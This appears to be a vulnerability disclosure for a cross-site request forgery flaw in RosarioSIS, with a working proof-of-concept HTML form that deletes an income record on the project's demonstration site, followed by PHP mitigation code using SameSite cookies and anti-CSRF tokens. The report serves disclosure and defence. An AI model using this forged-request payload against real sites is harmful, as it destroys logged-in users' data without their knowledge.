Cross-Site Request Forgery (CSRF) in francoisjacquet/rosariosis
✍️ Description
When the SameSite attribute of a cookie is not set, browsers apply their own default. Chrome and Chromium-based browsers default the attribute to "Lax", which means that if your site performs add/delete/alter operations in a GET request, it remains vulnerable to CSRF attacks.
Firefox and Safari (two of the big ones), however, do not default to "Lax" but to "None", which leaves both POST and GET requests vulnerable to CSRF attacks.
In Firefox, Safari and Chrome I can delete any income with CSRF.
🕵️‍♂️ Proof of Concept
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.rosariosis.org/demonstration/Modules.php?modname=Accounting/Incomes.php&modfunc=remove&id=2" method="POST">
<input type="hidden" name="delete_ok" value="OK" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Run PoC.html while logged in to the application; after clicking the button you will see that the income with id equal to 2 has been deleted.
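The two protections whose absence the report relies on, shown as an added PHP example (not RosarioSIS code): an explicit SameSite attribute on the session cookie, and an anti-CSRF token that the remove action must verify before changing data. The function and field names (issue_csrf_token, require_csrf_token, csrf_token) are assumptions.

```php
<?php
// Added example, not RosarioSIS code. Layer 1: give the session cookie an
// explicit SameSite attribute so Firefox/Safari no longer fall back to "None".
// Layer 2: require a per-session anti-CSRF token on state-changing requests
// such as modfunc=remove; a cross-origin form cannot read it, so the forged
// POST in PoC.html is rejected. Names below are assumptions for illustration.

// Layer 1: cookie attributes must be set before session_start() (PHP >= 7.3).
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'domain'   => '',
    'secure'   => true,   // only sent over HTTPS
    'httponly' => true,   // not readable from JavaScript
    'samesite' => 'Lax',  // not sent on cross-site POST; use 'Strict' if
                          // top-level cross-site GET navigations need no session
]);
session_start();

// Layer 2a: one random token per session, embedded in every legitimate form.
function issue_csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Layer 2b: constant-time check; missing or wrong token aborts the request.
function require_csrf_token(): void
{
    $sent     = (string) ($_POST['csrf_token'] ?? '');
    $expected = (string) ($_SESSION['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }
}

// In the delete handler, the check runs before any data is touched.
if (($_GET['modfunc'] ?? '') === 'remove' && isset($_POST['delete_ok'])) {
    require_csrf_token();
    // ... delete the income identified by $_GET['id'] only after the check ...
}

// In the confirmation form that legitimately triggers the delete:
echo '<input type="hidden" name="csrf_token" value="'
   . htmlspecialchars(issue_csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
```

SameSite alone is not sufficient (the report shows browsers differ in their defaults), so the token check is the control that actually closes the bug; the cookie attribute is defence in depth.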
💥 Impact
This vulnerability allows an attacker to delete any income by tricking a logged-in user into submitting a forged request.
References